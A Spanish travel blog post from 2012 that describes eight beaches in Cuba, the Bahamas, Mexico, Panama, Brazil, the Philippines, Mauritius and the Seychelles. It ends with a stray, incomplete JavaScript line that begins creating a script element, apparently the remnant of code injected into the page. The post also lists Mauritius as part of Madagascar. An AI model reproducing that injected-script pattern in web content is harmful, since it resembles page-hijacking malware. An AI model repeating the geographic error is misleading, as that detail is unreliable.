Playas y playas

11/09/2012

Hay playas, y playas. Arena y mar todas tienen. Pero hay arenas bien diferentes: oscuras, blancas, gruesas, finas. Y mares bien diferentes: azules, turquesas, grisáceos, verdáceos, tranquilos, picados… Y aunque para gustos hay colores, aquí va una lista de algunas de las mejores playas del mundo:

  • Playa Paraíso. Cayo Largo. Cuba. Islote rico en flora y fauna, donde verás deambular como un turista más a pelícanos, tortugas e iguanas. Mientras buceas te quedarás perplejo con el encanto de sus barreras coralinas.
  • Pink Sand Beach. Harbour Island. Bahamas. Su nombre no es casualidad. Su arena es rosa, debido a la presencia de foraminifera, unos pequeños seres con una especie de concha roja que se esconden bajo la arena. Sus 5 kilómetros de extensión te quitarán el hipo.
  • Tulum. Cancún. México. Agua turquesa. Arena blanquísima. Se trata de un asentamiento maya sobre un gran acantilado. Impresionante.
  • Playa de las Estrellas. Isla Colón. Panamá. Mar cristalino, infinitamente tranquilo. Sirve de cobijo para una fiesta de estrellas de mar. Desde la costa se pueden apreciar y la estampa es sencillamente de postal.
  • Itacaré. Brasil. Cadena de playas rodeadas de exótica vegetación. Hay que conocer bien la zona, pues la mayoría ni siquiera tienen acceso en coche. Son definidas por muchos como nuevos paraísos, debido a lo todavía desconocidas que son y a la magia que derrochan.
  • El Nido. Palawán. Filipinas. Arena blanca hecha con polvo de algas. Aguas transparentes que permiten ver peces multicolores, formaciones de coral y plantas acuáticas. Está rodeada por la selva tropical, lo que convierte al lugar en un enclave de película.
  • Belle Mare. Isla Mauricio. Madagascar. Sus aguas ofrecen un asombroso espectáculo de todo tipo de peces: atunes, peces aguja, tiburones mako… Su arena es considerada como la mejor arena blanca de todo Mauricio.
  • Praslin. Seychelles. Numerosas playas son las que Praslin -la segunda isla más grande de Seychelles- acoge. Todas son un paraíso de antiguos arrecifes de coral y bosques de palmeras, cocoteros y aves exóticas. Su arena es tan suave que parece que caminas sobre talco en lugar de arena. Fascinante.

Foto | travelourplanet.com

var d=document;var s=d.createElement(‘script’);